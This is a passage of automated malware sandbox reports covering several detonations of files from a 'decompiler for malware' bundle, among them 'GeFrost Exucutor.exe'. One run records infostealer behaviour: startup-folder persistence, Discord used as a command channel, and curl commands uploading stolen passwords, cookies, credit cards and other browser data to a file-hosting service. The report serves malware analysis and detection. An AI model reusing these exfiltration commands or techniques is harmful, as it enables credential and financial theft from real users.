US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

ubuntu2204-amd64-20240522.1-en

Max time network

132s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

121s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 a9716cb27a5041f08be37de9a27abcbb
SHA1 dd61a9582a1b52baa3a363a2a3abb4c48b74aff1
SHA256 1ce3ee206e7131007b2ae35cf297b4f4dd0887a014e5dbfcaa2eb06d9a2d5afa
SHA512 e7c1811894b377a746ebe0f01966ac51051dff2f870e8b2cabcea7b3bd5e1ec653142a5b192e15543c5b2014b7af6ac298101071e01dc3c8c4104a2d176e17ca

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

155s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 243.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240508-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\upx.exe"

Network

N/A

Files

memory/2456-0-0x0000000000400000-0x0000000000617000-memory.dmp

memory/2456-2-0x0000000000400000-0x0000000000617000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240221-en

Max time kernel

117s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23402\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GeFrost Exucutor.exe C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe
PID 4868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe
PID 2576 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4588 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2576 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 828 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 828 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 4232 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4232 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2284 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2384 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 4068 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4068 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2196 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2576 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe C:\Windows\system32\cmd.exe
PID 1488 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1488 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\GeFrost Exucutor.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupStart.vsd" https://store8.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Documents/BackupStart.vsd" https://store8.gofile.io/uploadFile

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 243.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 store8.gofile.io udp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 31.191.168.206.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 206.168.191.31:443 store8.gofile.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 224.107.17.2.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI48682\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI48682\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI48682\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI48682\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI48682\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_wmi.pyd

MD5 7ec3fc12c75268972078b1c50c133e9b
SHA1 73f9cf237fe773178a997ad8ec6cd3ac0757c71e
SHA256 1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f
